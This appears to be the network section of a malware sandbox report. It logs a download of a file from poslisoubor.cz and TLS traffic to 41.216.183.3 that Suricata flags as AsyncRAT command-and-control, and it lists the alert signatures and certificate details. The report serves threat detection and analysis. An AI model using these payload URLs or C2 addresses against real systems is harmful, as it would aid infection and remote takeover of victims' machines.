Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
poslisoubor.cz | 109.71.208.62 |
GET
200
http://poslisoubor.cz/gf.php?33f6c54a9a525e2c37453931c2aadebe/9.txt
REQUEST
RESPONSE
BODY
GET /gf.php?33f6c54a9a525e2c37453931c2aadebe/9.txt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: poslisoubor.cz
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2024 05:53:07 GMT
Server: Apache/2.4.38 (Debian)
X-Powered-By: PHP/5.6.40-0+deb8u5
Content-Disposition: attachment; filename="9.txt"
Content-Transfer-Encoding: binary
Content-Length: 494592
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/download
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 41.216.183.3:56001 -> 192.168.56.103:49165 | 2400002 | ET DROP Spamhaus DROP Listed Traffic Inbound group 3 | Misc Attack |
TCP 192.168.56.103:49165 -> 41.216.183.3:56001 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode |
TCP 192.168.56.103:49165 -> 41.216.183.3:56001 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode |
TCP 192.168.56.103:49165 -> 41.216.183.3:56001 | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
TCP 41.216.183.3:56001 -> 192.168.56.103:49165 | 2230002 | SURICATA TLS invalid record type | Generic Protocol Command Decode |
TCP 41.216.183.3:56001 -> 192.168.56.103:49165 | 2230010 | SURICATA TLS invalid record/traffic | Generic Protocol Command Decode |
TCP 41.216.183.3:56001 -> 192.168.56.103:49165 | 2035595 | ET MALWARE Generic AsyncRAT Style SSL Cert | Domain Observed Used for C2 Detected |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49165 41.216.183.3:56001 |
CN=Rlofxutfz | CN=Rlofxutfz | 58:60:84:11:c2:61:e1:a9:6f:bb:95:ea:4a:07:95:10:c4:6f:7f:4f |
Snort Alerts
No Snort Alerts